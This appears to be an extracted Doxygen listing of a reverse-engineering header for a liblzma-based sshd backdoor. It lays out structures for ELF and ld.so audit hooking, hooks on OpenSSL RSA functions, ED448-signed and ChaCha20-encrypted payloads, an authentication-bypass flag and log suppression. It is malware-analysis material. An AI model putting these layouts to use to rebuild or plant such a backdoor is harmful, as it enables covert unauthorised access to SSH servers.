16 #include <sys/select.h>
24 typedef uintptr_t uptr;
27 typedef unsigned int pid_t;
28 typedef unsigned int uid_t;
29 typedef unsigned int gid_t;
30 typedef unsigned int mode_t;
32 typedef uint16_t Elf64_Half;
33 typedef uint32_t Elf64_Word;
34 typedef int32_t Elf64_Sword;
35 typedef uint64_t Elf64_Xword;
36 typedef int64_t Elf64_Sxword;
37 typedef uint32_t Elf32_Addr;
38 typedef uint64_t Elf64_Addr;
39 typedef uint64_t Elf64_Off;
40 typedef uint16_t Elf64_Section;
42 typedef Elf64_Xword Elf64_Relr;
44 #define EI_NIDENT (16)
47 unsigned char e_ident[EI_NIDENT];
56 Elf64_Half e_phentsize;
58 Elf64_Half e_shentsize;
60 Elf64_Half e_shstrndx;
89 unsigned char st_info;
90 unsigned char st_other;
91 Elf64_Section st_shndx;
100 Elf64_Sxword r_addend;
104 Elf32_Sym, Elf64_Relr,
105 Elf64_Verdef, Elf64_Versym, sigset_t, fd_set, EVP_PKEY, RSA, DSA,
106 BIGNUM, EC_POINT, EC_KEY, EC_GROUP, EVP_MD, point_conversion_form_t,
107 EVP_CIPHER, EVP_CIPHER_CTX, ENGINE, EVP_MD_CTX, EVP_PKEY_CTX, BN_CTX;
109 void *(*alloc)(
void *opaque,
size_t nmemb,
size_t size);
110 void (*free)(
void *opaque,
void *ptr);
114 typedef long int Lmid_t;
115 #define ElfW(Sym) Elf64_Sym
133 LZMA_CHECK_CRC32 = 1,
140 LZMA_CHECK_CRC64 = 4,
147 LZMA_CHECK_SHA256 = 10
159 #include <openssl/dsa.h>
160 #include <openssl/ec.h>
161 #include <openssl/evp.h>
162 #include <openssl/rsa.h>
165 typedef Elf64_Xword Elf64_Relr;
168 #define UPTR(x) ((uptr)(x))
169 #define PTRADD(a, b) (UPTR(a) + UPTR(b))
170 #define PTRDIFF(a, b) (UPTR(a) - UPTR(b))
178 #define BUILD_BUG_ON_ZERO(e) ((int)(sizeof(struct { int:(-!!(e)); })))
179 #define __same_type(a, b) __builtin_types_compatible_p(typeof(a), typeof(b))
180 #define __must_be_array(a) BUILD_BUG_ON_ZERO(__same_type((a), &(a)[0]))
181 #define ARRAY_SIZE(arr) (sizeof(arr) / sizeof((arr)[0]) + __must_be_array(arr))
187 unsigned int bindflags;
190 typedef struct link_map *lookup_t;
197 uint32_t bloom_shift;
207 struct La_i86_retval;
208 struct La_x86_64_regs;
209 struct La_x86_64_retval;
211 struct La_x32_retval;
217 void (*activity) (uintptr_t *,
unsigned int);
218 char *(*objsearch) (
const char *, uintptr_t *,
unsigned int);
219 unsigned int (*objopen) (
struct link_map *, Lmid_t, uintptr_t *);
220 void (*preinit) (uintptr_t *);
223 uintptr_t (*symbind32) (Elf32_Sym *,
unsigned int, uintptr_t *,
224 uintptr_t *,
unsigned int *,
const char *);
225 uintptr_t (*symbind64) (Elf64_Sym *,
unsigned int, uintptr_t *,
226 uintptr_t *,
unsigned int *,
const char *);
230 Elf32_Addr (*i86_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
231 uintptr_t *,
struct La_i86_regs *,
232 unsigned int *,
const char *name,
233 long int *framesizep);
234 Elf64_Addr (*x86_64_gnu_pltenter) (Elf64_Sym *,
unsigned int,
236 uintptr_t *,
struct La_x86_64_regs *,
237 unsigned int *,
const char *name,
238 long int *framesizep);
239 Elf32_Addr (*x32_gnu_pltenter) (Elf32_Sym *,
unsigned int, uintptr_t *,
240 uintptr_t *,
struct La_x32_regs *,
241 unsigned int *,
const char *name,
242 long int *framesizep);
246 unsigned int (*i86_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
247 uintptr_t *,
const struct La_i86_regs *,
248 struct La_i86_retval *,
const char *);
249 unsigned int (*x86_64_gnu_pltexit) (Elf64_Sym *,
unsigned int,
252 const struct La_x86_64_regs *,
253 struct La_x86_64_retval *,
255 unsigned int (*x32_gnu_pltexit) (Elf32_Sym *,
unsigned int, uintptr_t *,
257 const struct La_x32_regs *,
258 struct La_x86_64_retval *,
261 unsigned int (*objclose) (uintptr_t *);
293 #define CHACHA20_KEY_SIZE 32
294 #define CHACHA20_IV_SIZE 16
295 #define SHA256_DIGEST_SIZE 32
296 #define ED448_KEY_SIZE 57
297 #define ED448_SIGNATURE_SIZE 114
299 #define X_BN_num_bytes(bits) (((bits)+7)/8)
302 #define XZDASM_OPC(op) (op - 0x80)
334 DF_MEM_SEG_OFFS = 0x4,
381 X_ELF_DYNAMIC_LINKER = 1,
387 XREF_xcalloc_zero_size = 0,
388 XREF_Could_not_chdir_to_home_directory_s_s = 1,
389 XREF_list_hostkey_types = 2,
390 XREF_demote_sensitive_data = 3,
391 XREF_mm_terminate = 4,
392 XREF_mm_pty_allocate = 5,
393 XREF_mm_do_pam_account = 6,
394 XREF_mm_session_pty_cleanup2 = 7,
395 XREF_mm_getpwnamallow = 8,
396 XREF_mm_sshpam_init_ctx = 9,
397 XREF_mm_sshpam_query = 10,
398 XREF_mm_sshpam_respond = 11,
399 XREF_mm_sshpam_free_ctx = 12,
400 XREF_mm_choose_dh = 13,
401 XREF_sshpam_respond = 14,
402 XREF_sshpam_auth_passwd = 15,
403 XREF_sshpam_query = 16,
405 XREF_mm_request_send = 18,
406 XREF_mm_log_handler = 19,
407 XREF_Could_not_get_agent_socket = 20,
408 XREF_auth_root_allowed = 21,
409 XREF_mm_answer_authpassword = 22,
410 XREF_mm_answer_keyallowed = 23,
411 XREF_mm_answer_keyverify = 24,
412 XREF_48s_48s_d_pid_ld_ = 25,
413 XREF_Unrecognized_internal_syslog_level_code_d = 26
419 STR_48s_48s_d_pid_ld_ = 0xd8,
421 STR_usr_sbin_sshd = 0x108,
422 STR_Accepted_password_for = 0x870,
423 STR_Accepted_publickey_for = 0x1a0,
424 STR_BN_bin2bn = 0xc40,
425 STR_BN_bn2bin = 0x6d0,
428 STR_BN_num_bits = 0x4e0,
429 STR_Connection_closed_by = 0x790,
430 STR_Could_not_chdir_to_home_directory_s_s = 0x18,
431 STR_Could_not_get_agent_socket = 0xb0,
433 STR_DSA_get0_pqg = 0x9d0,
434 STR_DSA_get0_pub_key = 0x468,
435 STR_EC_KEY_get0_group = 0x7e8,
436 STR_EC_KEY_get0_public_key = 0x268,
437 STR_EC_POINT_point2oct = 0x6e0,
438 STR_EVP_CIPHER_CTX_free = 0xb28,
439 STR_EVP_CIPHER_CTX_new = 0x838,
440 STR_EVP_DecryptFinal_ex = 0x2a8,
441 STR_EVP_DecryptInit_ex = 0xc08,
442 STR_EVP_DecryptUpdate = 0x3f0,
443 STR_EVP_Digest = 0xf8,
444 STR_EVP_DigestVerify = 0x408,
445 STR_EVP_DigestVerifyInit = 0x118,
446 STR_EVP_MD_CTX_free = 0xd10,
447 STR_EVP_MD_CTX_new = 0xaf8,
448 STR_EVP_PKEY_free = 0x6f8,
449 STR_EVP_PKEY_new_raw_public_key = 0x758,
450 STR_EVP_PKEY_set1_RSA = 0x510,
451 STR_EVP_chacha20 = 0xc28,
452 STR_EVP_sha256 = 0xc60,
454 STR_GLIBC_2_2_5 = 0x8c0,
455 STR_GLRO_dl_naudit_naudit = 0x6a8,
456 STR_KRB5CCNAME = 0x1e0,
457 STR_LD_AUDIT = 0xcf0,
458 STR_LD_BIND_NOT = 0xbc0,
459 STR_LD_DEBUG = 0xa90,
460 STR_LD_PROFILE = 0xb98,
461 STR_LD_USE_LOAD_BIAS = 0x3e0,
463 STR_RSA_free = 0xac0,
464 STR_RSA_get0_key = 0x798,
466 STR_RSA_public_decrypt = 0x1d0,
467 STR_RSA_set0_key = 0x540,
468 STR_RSA_sign = 0x8f8,
471 STR_Unrecognized_internal_syslog_level_code_d = 0xe0,
472 STR_WAYLAND_DISPLAY = 0x158,
473 STR_errno_location = 0x878,
474 STR_libc_stack_end = 0x2b0,
475 STR_libc_start_main = 0x228,
476 STR_dl_audit_preinit = 0xa60,
477 STR_dl_audit_symbind_alt = 0x9c8,
480 STR_rtld_global = 0x5b8,
481 STR_rtld_global_ro = 0xa98,
482 STR_auth_root_allowed = 0xb8,
483 STR_authenticating = 0x1d8,
484 STR_demote_sensitive_data = 0x28,
486 STR_ld_linux_x86_64_so = 0xa48,
488 STR_libcrypto_so = 0x7c0,
489 STR_liblzma_so = 0x590,
490 STR_libsystemd_so = 0x938,
491 STR_list_hostkey_types = 0x20,
492 STR_malloc_usable_size = 0x440,
493 STR_mm_answer_authpassword = 0xc0,
494 STR_mm_answer_keyallowed = 0xc8,
495 STR_mm_answer_keyverify = 0xd0,
496 STR_mm_answer_pam_start = 0x948,
497 STR_mm_choose_dh = 0x78,
498 STR_mm_do_pam_account = 0x40,
499 STR_mm_getpwnamallow = 0x50,
500 STR_mm_log_handler = 0xa8,
501 STR_mm_pty_allocate = 0x38,
502 STR_mm_request_send = 0xa0,
503 STR_mm_session_pty_cleanup2 = 0x48,
504 STR_mm_sshpam_free_ctx = 0x70,
505 STR_mm_sshpam_init_ctx = 0x58,
506 STR_mm_sshpam_query = 0x60,
507 STR_mm_sshpam_respond = 0x68,
508 STR_mm_terminate = 0x30,
509 STR_parse_PAM = 0xc58,
510 STR_password = 0x400,
513 STR_publickey = 0x7b8,
515 STR_rsa_sha2_256 = 0x710,
516 STR_setlogmask = 0x428,
517 STR_setresgid = 0x5f0,
518 STR_setresuid = 0xab8,
519 STR_shutdown = 0x760,
521 STR_ssh_rsa_cert_v01_openssh_com = 0x2c8,
522 STR_sshpam_auth_passwd = 0x88,
523 STR_sshpam_query = 0x90,
524 STR_sshpam_respond = 0x80,
525 STR_start_pam = 0x98,
530 STR_xcalloc_zero_size = 0x10,
531 STR_yolAbejyiejuvnupEvjtgvsh5okmkAvj = 0xb00,
536 #define assert_offset(t, f, o) static_assert(offsetof(t, f) == o)
538 #define assert_offset(t, f, o)
541 #define CONCAT(x, y) x ## y
542 #define EXPAND(x, y) CONCAT(x, y)
543 #define PADDING(size) u8 EXPAND(_unknown, __LINE__)[size]
549 #define PERMIT_NOT_SET -1
551 #define PERMIT_FORCED_ONLY 1
552 #define PERMIT_NO_PASSWD 2
571 struct sshkey **host_keys;
572 struct sshkey **host_pubkeys;
573 struct sshkey **host_certificates;
603 struct sshbuf *sk_key_handle;
604 struct sshbuf *sk_reserved;
606 struct sshkey_cert *cert;
608 u8 *shielded_private;
611 size_t shield_prekey_len;
614 typedef struct __attribute__((packed))
got_ctx {
638 assert_offset(
got_ctx_t, return_address, 0x8);
639 assert_offset(
got_ctx_t, cpuid_fn, 0x10);
640 assert_offset(
got_ctx_t, got_offset, 0x18);
641 static_assert(
sizeof(
got_ctx_t) == 0x20);
662 u64 instruction_size;
664 struct __attribute__((packed)) {
683 struct __attribute__((packed)) {
695 struct __attribute__((packed)) {
697 struct __attribute__((packed)) {
712 u64 operand_zeroextended;
719 assert_offset(
dasm_ctx_t, instruction_size, 8);
722 assert_offset(
dasm_ctx_t, lock_rep_byte, 0x14);
742 assert_offset(
dasm_ctx_t, operand_zeroextended, 0x40);
743 assert_offset(
dasm_ctx_t, operand_size, 0x48);
810 Elf64_Versym *versym;
811 Elf64_Rela *rela_relocs;
814 Elf64_Relr *relr_relocs;
828 u64 rodata_segment_start;
829 u64 rodata_segment_size;
830 u64 data_segment_start;
831 u64 data_segment_size;
832 u64 data_segment_alignment;
844 u32 gnu_hash_bloom_shift;
847 u32 *gnu_hash_buckets;
856 assert_offset(
elf_info_t, dyn_num_entries, 0x28);
860 assert_offset(
elf_info_t, plt_relocs_num, 0x48);
861 assert_offset(
elf_info_t, gnurelro_found, 0x4C);
862 assert_offset(
elf_info_t, gnurelro_vaddr, 0x50);
863 assert_offset(
elf_info_t, gnurelro_memsize, 0x58);
868 assert_offset(
elf_info_t, rela_relocs_num, 0x80);
870 assert_offset(
elf_info_t, relr_relocs_num, 0x90);
871 assert_offset(
elf_info_t, code_segment_start, 0x98);
872 assert_offset(
elf_info_t, code_segment_size, 0xA0);
873 assert_offset(
elf_info_t, rodata_segment_start, 0xA8);
874 assert_offset(
elf_info_t, rodata_segment_size, 0xB0);
875 assert_offset(
elf_info_t, data_segment_start, 0xB8);
876 assert_offset(
elf_info_t, data_segment_size, 0xC0);
877 assert_offset(
elf_info_t, data_segment_alignment, 0xC8);
879 assert_offset(
elf_info_t, gnu_hash_nbuckets, 0xd8);
880 assert_offset(
elf_info_t, gnu_hash_last_bloom, 0xdc);
881 assert_offset(
elf_info_t, gnu_hash_bloom_shift, 0xe0);
882 assert_offset(
elf_info_t, gnu_hash_bloom, 0xe8);
883 assert_offset(
elf_info_t, gnu_hash_buckets, 0xf0);
884 assert_offset(
elf_info_t, gnu_hash_chain, 0xf8);
888 u32 resolved_imports_count;
890 size_t (*malloc_usable_size)(
void *ptr);
891 uid_t (*getuid)(void);
892 void (*exit)(
int status);
893 int (*setresgid)(gid_t rgid, gid_t egid, gid_t sgid);
894 int (*setresuid)(uid_t ruid, uid_t euid, uid_t suid);
895 int (*system)(
const char *command);
896 ssize_t (*write)(
int fd,
const void *buf,
size_t count);
898 int nfds, fd_set *readfds, fd_set *writefds,
899 fd_set *exceptfds,
const struct timespec *timeout,
900 const sigset_t *sigmask);
901 ssize_t (*read)(
int fd,
void *buf,
size_t count);
902 int *(*__errno_location)(void);
903 int (*setlogmask)(
int mask);
904 int (*shutdown)(
int sockfd,
int how);
905 void *__libc_stack_end;
924 typedef int (*pfn_RSA_public_decrypt_t)(
925 int flen,
unsigned char *from,
unsigned char *to,
926 RSA *rsa,
int padding);
927 typedef int (*pfn_EVP_PKEY_set1_RSA_t)(EVP_PKEY *pkey,
struct rsa_st *key);
928 typedef void (*pfn_RSA_get0_key_t)(
930 const BIGNUM **n,
const BIGNUM **e,
const BIGNUM **d);
934 pfn_EVP_PKEY_set1_RSA_t EVP_PKEY_set1_RSA;
936 void (*RSA_get0_key_null)(
937 const RSA *r,
const BIGNUM **n,
938 const BIGNUM **e,
const BIGNUM **d);
954 void (*DSA_get0_pqg)(
955 const DSA *d,
const BIGNUM **p,
956 const BIGNUM **q,
const BIGNUM **g);
957 const BIGNUM *(*DSA_get0_pub_key)(
const DSA *d);
958 size_t (*EC_POINT_point2oct)(
959 const EC_GROUP *group,
const EC_POINT *p,
960 point_conversion_form_t form,
unsigned char *buf,
961 size_t len, BN_CTX *ctx);
962 EC_POINT *(*EC_KEY_get0_public_key)(
const EC_KEY *key);
963 const EC_GROUP *(*EC_KEY_get0_group)(
const EC_KEY *key);
964 EVP_MD *(*EVP_sha256)(void);
965 pfn_RSA_get0_key_t RSA_get0_key;
966 int (*BN_num_bits)(
const BIGNUM *a);
967 EVP_PKEY *(*EVP_PKEY_new_raw_public_key)(
969 const unsigned char *key,
size_t keylen);
970 EVP_MD_CTX *(*EVP_MD_CTX_new)(void);
971 int (*EVP_DigestVerifyInit)(
972 EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
973 const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
974 int (*EVP_DigestVerify)(
975 EVP_MD_CTX *ctx,
const unsigned char *sig,
976 size_t siglen,
const unsigned char *tbs,
size_t tbslen);
977 void (*EVP_MD_CTX_free)(EVP_MD_CTX *ctx);
978 void (*EVP_PKEY_free)(EVP_PKEY *key);
979 EVP_CIPHER_CTX *(*EVP_CIPHER_CTX_new)(void);
980 int (*EVP_DecryptInit_ex)(
981 EVP_CIPHER_CTX *ctx,
const EVP_CIPHER *type,
982 ENGINE *impl,
const unsigned char *key,
const unsigned char *iv);
983 int (*EVP_DecryptUpdate)(
984 EVP_CIPHER_CTX *ctx,
unsigned char *out,
985 int *outl,
const unsigned char *in,
int inl);
986 int (*EVP_DecryptFinal_ex)(EVP_CIPHER_CTX *ctx,
unsigned char *outm,
int *outl);
987 void (*EVP_CIPHER_CTX_free)(EVP_CIPHER_CTX *ctx);
988 const EVP_CIPHER *(*EVP_chacha20)(void);
989 RSA *(*RSA_new)(void);
990 BIGNUM *(*BN_dup)(
const BIGNUM *from);
991 BIGNUM *(*BN_bin2bn)(
const unsigned char *s,
int len, BIGNUM *ret);
992 int (*RSA_set0_key)(RSA *r, BIGNUM *n, BIGNUM *e, BIGNUM *d);
994 const void *data,
size_t count,
unsigned char *md,
995 unsigned int *size,
const EVP_MD *type, ENGINE *impl);
998 const unsigned char *m,
unsigned int m_len,
999 unsigned char *sigret,
unsigned int *siglen, RSA *rsa);
1000 int (*BN_bn2bin)(
const BIGNUM *a,
unsigned char *to);
1001 void (*RSA_free)(RSA *rsa);
1002 void (*BN_free)(BIGNUM *a);
1004 u32 resolved_imports_count;
1050 typedef int (*sshd_monitor_func_t)(
struct ssh *ssh,
int sock,
struct sshbuf *m);
1053 BOOL have_mm_answer_keyallowed;
1054 BOOL have_mm_answer_authpassword;
1055 BOOL have_mm_answer_keyverify;
1058 void *mm_answer_keyallowed;
1059 void *mm_answer_keyverify;
1060 void *mm_answer_authpassword_start;
1061 void *mm_answer_authpassword_end;
1062 sshd_monitor_func_t *mm_answer_authpassword_ptr;
1063 int monitor_reqtype_authpassword;
1065 void *mm_answer_keyallowed_start;
1066 void *mm_answer_keyallowed_end;
1067 void *mm_answer_keyallowed_ptr;
1068 u32 mm_answer_keyallowed_reqtype;
1070 void *mm_answer_keyverify_start;
1071 void *mm_answer_keyverify_end;
1072 void *mm_answer_keyverify_ptr;
1079 char *STR_unknown_ptr;
1080 void *mm_request_send_start;
1081 void *mm_request_send_end;
1082 PADDING(
sizeof(u32));
1083 PADDING(
sizeof(u32));
1085 int *permit_root_login_ptr;
1086 char *STR_without_password;
1087 char *STR_publickey;
1090 assert_offset(
sshd_ctx_t, have_mm_answer_keyallowed, 0x0);
1091 assert_offset(
sshd_ctx_t, have_mm_answer_authpassword, 0x4);
1092 assert_offset(
sshd_ctx_t, have_mm_answer_keyverify, 0x8);
1094 assert_offset(
sshd_ctx_t, mm_answer_keyallowed, 0x18);
1095 assert_offset(
sshd_ctx_t, mm_answer_keyverify, 0x20);
1096 assert_offset(
sshd_ctx_t, mm_answer_authpassword_start, 0x28);
1097 assert_offset(
sshd_ctx_t, mm_answer_authpassword_end, 0x30);
1098 assert_offset(
sshd_ctx_t, mm_answer_authpassword_ptr, 0x38);
1099 assert_offset(
sshd_ctx_t, monitor_reqtype_authpassword, 0x40);
1100 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_start, 0x48);
1101 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_end, 0x50);
1102 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_ptr, 0x58);
1103 assert_offset(
sshd_ctx_t, mm_answer_keyallowed_reqtype, 0x60);
1104 assert_offset(
sshd_ctx_t, mm_answer_keyverify_start, 0x68);
1105 assert_offset(
sshd_ctx_t, mm_answer_keyverify_end, 0x70);
1106 assert_offset(
sshd_ctx_t, mm_answer_keyverify_ptr, 0x78);
1107 assert_offset(
sshd_ctx_t, writebuf_size, 0x84);
1109 assert_offset(
sshd_ctx_t, STR_unknown_ptr, 0xA0);
1110 assert_offset(
sshd_ctx_t, mm_request_send_start, 0xA8);
1111 assert_offset(
sshd_ctx_t, mm_request_send_end, 0xB0);
1112 assert_offset(
sshd_ctx_t, use_pam_ptr, 0xC0);
1113 assert_offset(
sshd_ctx_t, permit_root_login_ptr, 0xC8);
1114 assert_offset(
sshd_ctx_t, STR_without_password, 0xD0);
1115 assert_offset(
sshd_ctx_t, STR_publickey, 0xD8);
1122 SYSLOG_LEVEL_VERBOSE,
1123 SYSLOG_LEVEL_DEBUG1,
1124 SYSLOG_LEVEL_DEBUG2,
1125 SYSLOG_LEVEL_DEBUG3,
1126 SYSLOG_LEVEL_NOT_SET = -1
1129 typedef void (*log_handler_fn)(
1136 BOOL logging_disabled;
1137 BOOL log_hooking_possible;
1138 BOOL syslog_disabled;
1140 char *STR_percent_s;
1141 char *STR_Connection_closed_by;
1143 char *STR_authenticating;
1147 void *log_handler_ptr;
1148 void *log_handler_ctx_ptr;
1149 log_handler_fn orig_log_handler;
1150 void *orig_log_handler_ctx;
1152 void (*mm_log_handler)(
int level,
int forced,
const char *msg,
void *ctx);
1173 struct __attribute__((packed)) {
1181 struct __attribute__((packed)) {
1182 u8 sshbuf_data_qword_index;
1183 u8 sshbuf_size_qword_index;
1241 struct monitor **struct_monitor_ptr_address;
1278 u64 sock_read_buf_size;
1279 u8 sock_read_buf[64];
1280 u64 payload_data_size;
1285 u32 sshd_host_pubkey_idx;
1290 u8 secret_data[ED448_KEY_SIZE];
1296 u8 shift_operations[31];
1341 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1444 void (*_dl_audit_symbind_alt)(
struct link_map *l,
const ElfW(Sym) *ref,
void **value, lookup_t result);
1454 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
1460 pfn_EVP_PKEY_set1_RSA_t hook_EVP_PKEY_set1_RSA;
1465 pfn_RSA_get0_key_t hook_RSA_get0_key;
1467 u64 hooks_installed;
1470 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_ptr, 0x40);
1471 assert_offset(
ldso_ctx_t, libcrypto_auditstate_bindflags_old_value, 0x48);
1472 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_ptr, 0x50);
1473 assert_offset(
ldso_ctx_t, sshd_auditstate_bindflags_old_value, 0x58);
1474 assert_offset(
ldso_ctx_t, sshd_link_map_l_audit_any_plt_addr, 0x60);
1475 assert_offset(
ldso_ctx_t, link_map_l_audit_any_plt_bitmask, 0x68);
1476 assert_offset(
ldso_ctx_t, _dl_audit_ptr, 0x70);
1477 assert_offset(
ldso_ctx_t, _dl_naudit_ptr, 0x78);
1478 assert_offset(
ldso_ctx_t, hooked_audit_ifaces, 0x80);
1480 assert_offset(
ldso_ctx_t, libcrypto_l_name, 0xF8);
1481 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt, 0x100);
1482 assert_offset(
ldso_ctx_t, _dl_audit_symbind_alt__size, 0x108);
1483 assert_offset(
ldso_ctx_t, hook_RSA_public_decrypt, 0x110);
1484 assert_offset(
ldso_ctx_t, hook_EVP_PKEY_set1_RSA, 0x118);
1485 assert_offset(
ldso_ctx_t, hook_RSA_get0_key, 0x120);
1487 assert_offset(
ldso_ctx_t, hooks_installed, 0x130);
1498 u64 signed_data_size;
1516 uintptr_t (*symbind64)(
1517 Elf64_Sym *sym,
unsigned int ndx,
1518 uptr *refcook, uptr *defcook,
1519 unsigned int flags,
const char *symname);
1520 pfn_RSA_public_decrypt_t hook_RSA_public_decrypt;
1521 pfn_RSA_get0_key_t hook_RSA_get0_key;
1522 log_handler_fn mm_log_handler;
1523 PADDING(
sizeof(
void *));
1524 PADDING(
sizeof(
void *));
1525 sshd_monitor_func_t mm_answer_keyallowed;
1526 sshd_monitor_func_t mm_answer_keyverify;
1527 PADDING(
sizeof(
void *));
1583 Elf64_Ehdr *dynamic_linker_ehdr;
1584 void **__libc_stack_end;
1588 assert_offset(
main_elf_t, dynamic_linker_ehdr, 0x8);
1589 assert_offset(
main_elf_t, __libc_stack_end, 0x10);
1653 struct link_map *liblzma_map;
1654 struct link_map *libcrypto_map;
1655 struct link_map *libsystemd_map;
1656 struct link_map *libc_map;
1693 lzma_allocator fake_allocator;
1769 u32 operation_index;
1792 typedef union __attribute__((packed)) {
1806 u8 signature[ED448_SIGNATURE_SIZE];
1824 #define TEST_FLAG(x, flag) (((x) & (flag)) != 0)
1863 X_FLAGS2_AUTH_BYPASS = 0x4,
1901 const BIGNUM *rsa_n;
1902 const BIGNUM *rsa_e;
1905 PADDING(CHACHA20_KEY_SIZE + CHACHA20_IV_SIZE);
1906 u8 ivec[CHACHA20_IV_SIZE];
1907 u8 ed448_key[ED448_KEY_SIZE];
1914 assert_offset(
key_ctx_t, payload, 0x15);
1916 assert_offset(
key_ctx_t, ed448_key, 0x27D);
1926 const BIGNUM *rsa_n;
1927 const BIGNUM *rsa_e;
1929 u16 payload_body_size;
1948 struct timespec timespec;
1963 u64 hostkey_hash_offset;
1965 u8 *payload_data_ptr;
1974 struct __attribute__((packed)) {
1979 struct __attribute__((packed)) {
1981 u64 num_host_pubkeys;
1982 u8 ed448_key[ED448_KEY_SIZE];
2053 PADDING(
sizeof(u64));
2060 PADDING(
sizeof(u64));
2061 PADDING(
sizeof(u64));
2068 PADDING(
sizeof(u64));
2083 PADDING(
sizeof(u64));
2084 lzma_allocator allocator;
2114 u8 *output_register;
2247 BOOL is_64bit_operand,
2270 BOOL is_64bit_operand,
2336 EncodedStringId encoded_string_id,
2390 FuncFindType find_mode);
2449 extern char *check_argument(
char arg_first_char,
char* arg_name);
2562 EncodedStringId encoded_string_id);
2596 StringXrefId xref_id,
2597 void **pOutCodeStart,
void **pOutCodeEnd,
2616 EncodedStringId *stringId_inOut,
2617 void *rodata_start_ptr);
2687 unsigned shift_count, BOOL start_from_call);
2701 unsigned operation_index,
2702 unsigned shift_count,
2703 int index, u8 *code);
2731 unsigned shift_count,
unsigned operation_index);
2776 u8 *call_site, u8 *code,
2778 unsigned shift_count,
unsigned operation_index);
2793 unsigned shift_count,
unsigned operation_index,
2911 struct link_map *libc,
2988 extern EncodedStringId
get_string_id(
const char *string_begin,
const char *string_end);
3029 extern unsigned int _get_cpuid_modified(
unsigned int leaf,
unsigned int *eax,
unsigned int *ebx,
unsigned int *ecx,
unsigned int *edx, u64 *caller_frame);
3042 extern void _cpuid_gcc(
unsigned int level,
unsigned int *a,
unsigned int *b,
unsigned int *c,
unsigned int *d);
3130 uptr *refcook, uptr *defcook,
3132 const char *symname);
3163 ptrdiff_t *libname_offset,
3191 ptrdiff_t *libname_offset,
3238 ptrdiff_t libname_offset,
3281 void **sensitive_data_out);
3302 void **sensitive_data_out,
3372 u8 *buffer, u64 bufferSize,
3453 u64 sshkey_digest_offset,
3454 u64 signed_data_size,
3472 BOOL skip_root_patch,
3474 BOOL replace_monitor_reqtype,
3475 int monitor_reqtype,
3503 u8 **code_start_out,
3541 void **monitor_field_ptr_out,
3559 void *mem_range_start,
3627 enum SocketMode socket_direction
3673 size_t *pOutPayloadSize,
3686 size_t payload_size,
3781 unsigned int num_pointers
3816 LogLevel level,
const char *fmt, ...);
3846 static_assert(
sizeof(global_ctx) == 0x8);
int RSA_public_decrypt(int flen, const unsigned char *from, unsigned char *to, RSA *rsa, int padding)
Definition: ssh_patch.c:37
ptrdiff_t backdoor_init_stage2_got_offset
offset from the symbol backdoor_init_stage2() to the GOT
Definition: xzre.h:2025
ptrdiff_t cpuid_random_symbol_got_offset
offset from the symbol cpuid_random_symbol to the GOT
Definition: xzre.h:2013
u64 cpuid_got_index
index in the GOT for _cpuid()
Definition: xzre.h:2019
data passed to functions that access the backdoor data
Definition: xzre.h:1597
this structure is used to hold most of the backdoor information. it's used as a local variable in fun...
Definition: xzre.h:1642
libc_imports_t libc_imports
functions imported from libc
Definition: xzre.h:1687
string_references_t string_refs
information about resolved string references and the containing functions boundaries
Definition: xzre.h:1692
struct link_map * main_map
this is for sshd itself
Definition: xzre.h:1647
elf_info_t libc_info
ELF context for libc.so.
Definition: xzre.h:1677
elf_info_t libcrypto_info
ELF context for libcrypto.so.
Definition: xzre.h:1682
elf_info_t dynamic_linker_info
ELF context for ld.so.
Definition: xzre.h:1673
elf_info_t main_info
this is for sshd itself
Definition: xzre.h:1667
lzma_allocator * import_resolver
ELF import resolver (fake LZMA allocator)
Definition: xzre.h:1697
struct link_map * dynamic_linker_map
this is for ld.so
Definition: xzre.h:1652
void * EVP_PKEY_set1_RSA_plt
address of the PLT for EVP_PKEY_set1_RSA() in sshd
Definition: xzre.h:1731
void * RSA_get0_key_plt
address of the PLT for RSA_get0_key() in sshd
Definition: xzre.h:1736
void * RSA_public_decrypt_plt
address of the PLT for RSA_public_decrypt() in sshd
Definition: xzre.h:1726
ptrdiff_t tls_get_addr_plt_offset
offset from the symbol __tls_get_addr() to the PLT
Definition: xzre.h:2039
ptrdiff_t tls_get_addr_random_symbol_got_offset
offset from the symbol tls_get_addr_random_symbol to the GOT
Definition: xzre.h:2045
u8 flags2
see InstructionFlags2
Definition: xzre.h:672
u8 flags
see InstructionFlags
Definition: xzre.h:668
void * symbol_ptr
points to a symbol in memory; will be used to find the GOT value
Definition: xzre.h:648
u64 * frame_address
stores the value of __builtin_frame_address(0)-16
Definition: xzre.h:653
array of ELF handles
Definition: xzre.h:1557
elf_info_t * dynamic_linker
ELF context for ld.so.
Definition: xzre.h:1568
elf_info_t * main
this is for sshd
Definition: xzre.h:1562
u64 code_segment_size
page-aligned virtual size of the first executable ELF segment
Definition: xzre.h:826
u64 first_vaddr
virtual address of the first program header
Definition: xzre.h:755
u64 gnurelro_memsize
size of the GNU relro segment
Definition: xzre.h:801
Elf64_Verdef * verdef
pointer to the ELF symbol versioning (from DT_VERDEF)
Definition: xzre.h:805
u32 gnu_hash_last_bloom
last valid bloom value
Definition: xzre.h:843
Elf64_Dyn * dyn
pointer to the ELF dynamic segment
Definition: xzre.h:767
char * strtab
pointer to the ELF string table
Definition: xzre.h:775
Elf64_Phdr * phdrs
pointer to the ELF program headers array in memory
Definition: xzre.h:759
u32 gnu_hash_nbuckets
number of GNU hash buckets (from DT_GNU_HASH)
Definition: xzre.h:839
Elf64_Ehdr * elfbase
points to the ELF base address in memory
Definition: xzre.h:751
u64 e_phnum
copy of the ELF program header count from the ELF header
Definition: xzre.h:763
Elf64_Rela * plt_relocs
pointer to the ELF PLT relocations table
Definition: xzre.h:783
BOOL gnurelro_found
whether the loaded ELF contains PT_GNU_RELRO or not which specifies the location and size of a segmen...
Definition: xzre.h:793
u64 code_segment_start
page-aligned virtual address of the first executable ELF segment
Definition: xzre.h:821
u64 verdef_num
number of entries in the symbol versioning table
Definition: xzre.h:809
u64 gnurelro_vaddr
